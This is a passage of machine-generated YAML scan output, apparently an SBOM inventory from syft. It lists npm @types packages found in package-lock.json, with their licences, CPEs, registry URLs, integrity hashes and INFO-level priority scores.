integrity: sha512-XCuKFP5PS55gnMVu3dty8KPatLqUoy/ZYzDzAGCQ8JNFCkLXzmI7vNHCR+XpbZaMWQK/vQubr7PkYq8g470J/A==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 80bf92167036230d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @types/caseless 0.12.5'
title: '@types/caseless 0.12.5'
description: 'Package discovered: @types/caseless 0.12.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 7578f19b88adc968
name: '@types/caseless'
version: 0.12.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@types\/caseless:\@types\/caseless:0.12.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40types/caseless@0.12.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@types/caseless/-/caseless-0.12.5.tgz
integrity: sha512-hWtVTC2q7hc7xZ/RLbxapMvDMgUnDvKvMOpKal4DrMyfGBUfB1oKaZlIRr6mJL+If3bAP6sV/QneGzF6tJjZDg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a5c07d1028c25891
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @types/cors 2.8.19'
title: '@types/cors 2.8.19'
description: 'Package discovered: @types/cors 2.8.19'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 8b6775e086bda391
name: '@types/cors'
version: 2.8.19
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@types\/cors:\@types\/cors:2.8.19:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40types/cors@2.8.19
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@types/cors/-/cors-2.8.19.tgz
integrity: sha512-mFNylyeyqN93lfe/9CSxOGREz8cpzAhH+E93xJ4xWQf62V8sQ/24reV2nyzUWM6H6Xji+GGHpkbLe7pVoUEskg==
dependencies:
'@types/node': '*'
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d3e89ddbd967f67d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @types/d3-array 3.2.2'
title: '@types/d3-array 3.2.2'
description: 'Package discovered: @types/d3-array 3.2.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 59c0361f7de521dd
name: '@types/d3-array'
version: 3.2.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@types\/d3-array:\@types\/d3-array:3.2.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3-array:\@types\/d3_array:3.2.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3_array:\@types\/d3-array:3.2.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3_array:\@types\/d3_array:3.2.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-array:3.2.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_array:3.2.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40types/d3-array@3.2.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@types/d3-array/-/d3-array-3.2.2.tgz
integrity: sha512-hOLWVbm7uRza0BYXpIIW5pxfrKe0W+D5lrFiAEYR+pb6w3N2SwSMaJbXdUfSEv+dT4MfHBLtn5js0LAWaO6otw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 4a5d6407d36c3dfe
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @types/d3-color 3.1.3'
title: '@types/d3-color 3.1.3'
description: 'Package discovered: @types/d3-color 3.1.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: ad88e8187765d8aa
name: '@types/d3-color'
version: 3.1.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@types\/d3-color:\@types\/d3-color:3.1.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3-color:\@types\/d3_color:3.1.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3_color:\@types\/d3-color:3.1.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3_color:\@types\/d3_color:3.1.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-color:3.1.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_color:3.1.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40types/d3-color@3.1.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@types/d3-color/-/d3-color-3.1.3.tgz
integrity: sha512-iO90scth9WAbmgv7ogoq57O9YpKmFBbmoEoCHDB2xMBY0+/KVrqAaCDyCE16dUspeOvIxFFRI+0sEtqDqy2b4A==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 075de1dd01220805
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @types/d3-ease 3.0.2'
title: '@types/d3-ease 3.0.2'
description: 'Package discovered: @types/d3-ease 3.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: df6234ea1d1790c8
name: '@types/d3-ease'
version: 3.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@types\/d3-ease:\@types\/d3-ease:3.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3-ease:\@types\/d3_ease:3.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3_ease:\@types\/d3-ease:3.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3_ease:\@types\/d3_ease:3.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-ease:3.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_ease:3.0.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40types/d3-ease@3.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@types/d3-ease/-/d3-ease-3.0.2.tgz
integrity: sha512-NcV1JjO5oDzoK26oMzbILE6HW7uVXOHLQvHshBUW4UMdZGfiY6v5BeQwh9a9tCzv+CeefZQHJt5SRgK154RtiA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ac33d3528c07735d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @types/d3-interpolate 3.0.4'
title: '@types/d3-interpolate 3.0.4'
description: 'Package discovered: @types/d3-interpolate 3.0.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: d2cfc65d37d7fda7
name: '@types/d3-interpolate'
version: 3.0.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@types\/d3-interpolate:\@types\/d3-interpolate:3.0.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3-interpolate:\@types\/d3_interpolate:3.0.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3_interpolate:\@types\/d3-interpolate:3.0.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3_interpolate:\@types\/d3_interpolate:3.0.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-interpolate:3.0.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_interpolate:3.0.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40types/d3-interpolate@3.0.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@types/d3-interpolate/-/d3-interpolate-3.0.4.tgz
integrity: sha512-mgLPETlrpVV1YRJIglr4Ez47g7Yxjl1lj7YKsiMCb27VJH9W8NVM6Bb9d8kkpG/uAQS5AmbA48q2IAolKKo1MA==
dependencies:
'@types/d3-color': '*'
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 9ef37f1ec9a73980
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @types/d3-path 3.1.1'
title: '@types/d3-path 3.1.1'
description: 'Package discovered: @types/d3-path 3.1.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 0128eed2457b60d1
name: '@types/d3-path'
version: 3.1.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@types\/d3-path:\@types\/d3-path:3.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3-path:\@types\/d3_path:3.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3_path:\@types\/d3-path:3.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3_path:\@types\/d3_path:3.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-path:3.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_path:3.1.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40types/d3-path@3.1.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@types/d3-path/-/d3-path-3.1.1.tgz
integrity: sha512-VMZBYyQvbGmWyWVea0EHs/BwLgxc+MKi1zLDCONksozI4YJMcTt8ZEuIR4Sb1MMTE8MMW49v0IwI5+b7RmfWlg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: b363e223fe02334b
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @types/d3-scale 4.0.9'
title: '@types/d3-scale 4.0.9'
description: 'Package discovered: @types/d3-scale 4.0.9'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 6f0b81bc9d69ce92
name: '@types/d3-scale'
version: 4.0.9
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@types\/d3-scale:\@types\/d3-scale:4.0.9:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3-scale:\@types\/d3_scale:4.0.9:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3_scale:\@types\/d3-scale:4.0.9:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3_scale:\@types\/d3_scale:4.0.9:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-scale:4.0.9:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_scale:4.0.9:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40types/d3-scale@4.0.9
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@types/d3-scale/-/d3-scale-4.0.9.tgz
integrity: sha512-dLmtwB8zkAeO/juAMfnV+sItKjlsw2lKdZVVy6LRr0cBmegxSABiLEpGVmSJJ8O08i4+sGR6qQtb6WtuwJdvVw==
dependencies:
'@types/d3-time': '*'
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 22226a3e628ac76c
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @types/d3-shape 3.1.8'
title: '@types/d3-shape 3.1.8'
description: 'Package discovered: @types/d3-shape 3.1.8'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 533995aeaf2ae857
name: '@types/d3-shape'
version: 3.1.8
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@types\/d3-shape:\@types\/d3-shape:3.1.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3-shape:\@types\/d3_shape:3.1.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3_shape:\@types\/d3-shape:3.1.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3_shape:\@types\/d3_shape:3.1.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-shape:3.1.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_shape:3.1.8:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40types/d3-shape@3.1.8
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@types/d3-shape/-/d3-shape-3.1.8.tgz
integrity: sha512-lae0iWfcDeR7qt7rA88BNiqdvPS5pFVPpo5OfjElwNaT2yyekbM0C9vK+yqBqEmHr6lDkRnYNoTBYlAgJa7a4w==
dependencies:
'@types/d3-path': '*'
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: e91025b60bc33c45
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @types/d3-time 3.0.4'
title: '@types/d3-time 3.0.4'
description: 'Package discovered: @types/d3-time 3.0.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: d051a01827d6eb95
name: '@types/d3-time'
version: 3.0.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@types\/d3-time:\@types\/d3-time:3.0.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3-time:\@types\/d3_time:3.0.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3_time:\@types\/d3-time:3.0.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3_time:\@types\/d3_time:3.0.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-time:3.0.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_time:3.0.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40types/d3-time@3.0.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@types/d3-time/-/d3-time-3.0.4.tgz
integrity: sha512-yuzZug1nkAAaBlBBikKZTgzCeA+k1uy4ZFwWANOfKw5z5LRhV0gNA7gNkKm7HoK+HRN0wX3EkxGk0fpbWhmB7g==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 83378a6b374bc40d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @types/d3-timer 3.0.2'
title: '@types/d3-timer 3.0.2'
description: 'Package discovered: @types/d3-timer 3.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: a9187c78265f1b66
name: '@types/d3-timer'
version: 3.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@types\/d3-timer:\@types\/d3-timer:3.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3-timer:\@types\/d3_timer:3.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3_timer:\@types\/d3-timer:3.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3_timer:\@types\/d3_timer:3.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-timer:3.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_timer:3.0.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40types/d3-timer@3.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@types/d3-timer/-/d3-timer-3.0.2.tgz
integrity: sha512-Ps3T8E8dZDam6fUyNiMkekK3XUsaUEik+idO9/YjPtfj2qruF8tFBXS7XhtE4iIXBLxhmLjP3SXpLhVf21I9Lw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 4a3de97ef48e263d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @types/jsonwebtoken 9.0.10'
title: '@types/jsonwebtoken 9.0.10'
description: 'Package discovered: @types/jsonwebtoken 9.0.10'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: bbe9092f97742247
name: '@types/jsonwebtoken'
version: 9.0.10
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@types\/jsonwebtoken:\@types\/jsonwebtoken:9.0.10:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40types/jsonwebtoken@9.0.10
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@types/jsonwebtoken/-/jsonwebtoken-9.0.10.tgz
integrity: sha512-asx5hIG9Qmf/1oStypjanR7iKTv0gXQ1Ov/jfrX6kS/EO0OFni8orbmGCn0672NHR3kXHwpAwR+B368ZGN/2rA==
dependencies:
'@types/ms': '*'
'@types/node': '*'
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: be245f9788db1459
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @types/long 4.0.2'
title: '@types/long 4.0.2'
description: 'Package discovered: @types/long 4.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 69a126982af5137d
name: '@types/long'
version: 4.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@types\/long:\@types\/long:4.0.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40types/long@4.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@types/long/-/long-4.0.2.tgz
integrity: sha512-MqTGEo5bj5t157U6fA/BiDynNkn0YknVdh48CMPkTSpFTVmvao5UQmm7uEF6xBEo7qIMAlY/JSleYaE6VOdpaA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: b5bebd78899827a5
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @types/ms 2.1.0'
title: '@types/ms 2.1.0'
description: 'Package discovered: @types/ms 2.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: fa54533e742eac71
name: '@types/ms'
version: 2.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@types\/ms:\@types\/ms:2.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40types/ms@2.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@types/ms/-/ms-2.1.0.tgz
integrity: sha512-GsCCIZDE/p3i96vtEqx+7dBUGXrc7zeSK3wwPHIaRThS+9OhWIXRqzs4d6k1SVU8g91DrNRWxWUGhp5KXQb2VA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 191b23786146803d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @types/node 20.19.39'
title: '@types/node 20.19.39'
description: 'Package discovered: @types/node 20.19.39'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: c19052194c7f9053
name: '@types/node'
version: 20.19.39
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@types\/node:\@types\/node:20.19.39:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40types/node@20.19.39
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@types/node/-/node-20.19.39.tgz
integrity: sha512-orrrD74MBUyK8jOAD/r0+lfa1I2MO6I+vAkmAWzMYbCcgrN4lCrmK52gRFQq/JRxfYPfonkr4b0jcY7Olqdqbw==
dependencies:
undici-types: ~6.21.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
